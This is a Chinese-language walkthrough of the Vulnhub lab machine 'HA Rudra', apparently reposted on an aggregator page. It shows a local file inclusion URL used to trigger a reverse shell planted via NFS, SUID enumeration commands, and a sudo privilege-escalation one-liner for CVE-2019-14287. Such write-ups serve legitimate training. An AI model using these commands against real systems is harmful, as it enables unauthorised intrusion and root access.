zoukankan      html  css  js  c++  java
  • HA Rudra: Vulnhub Walkthrough

    最近忙的工(吃)作(屎),没时间写文(摸)章(鱼)!!!

    靶机链接:

    https://www.vulnhub.com/entry/ha-rudra,386/

    IP探测:

    端口扫描:

    2049 NFS 文件系统,尝试本地挂载

    目前看没啥有用的信息,后续尝试提权的时候,或者爆破的时候在看吧

    HTTP 服务目录扫描

    访问:http://10.10.202.130/nandi.php 空白页面

    最后尝试得知有包含漏洞

    通过NFS目录写反弹shell进去,反弹shell出来

    本地监听1234

    浏览器访问:10.10.202.130/nandi.php?file=/home/shivay/shell.php

    即可返回shell

    尝试提权操作:

    find / -perm -u=s -type f 2>/dev/null

    find / -perm -g=s -type f 2>/dev/null

    无可用信息

    查看本地服务,登录MySQL数据库,空密码

    哈哈表情符号

    查看hints 文件提示解密表情符号

    cat hints
    https://www.hackingarticles.in/cloakify-factory-a-data-exfiltration-tool-uses-text-based-steganography/

    without noise

    复制表情符号到本地文本,然后使用该工具进行解密

    ╰─ git clone https://github.com/TryCatchHCF/Cloakify.git

    远程登录

    哈哈这个本地提权的漏洞好熟悉 CVE: 2019-14287

    sudo -u#-1 watch -x sh -c 'reset; exec sh 1>&0 2>&0' -u

    OVER!

  • 相关阅读:
    进程间通信
    图形的保存与重绘
    mysql记录1
    文件操作
    多线程及聊天室程序
    健康是成功之本
    文档与串行化
    HTML网页制作基础
    Hook和数据库访问
    C++基础笔记1
  • 原文地址:https://www.cnblogs.com/hack404/p/12120439.html
Copyright © 2011-2022 走看看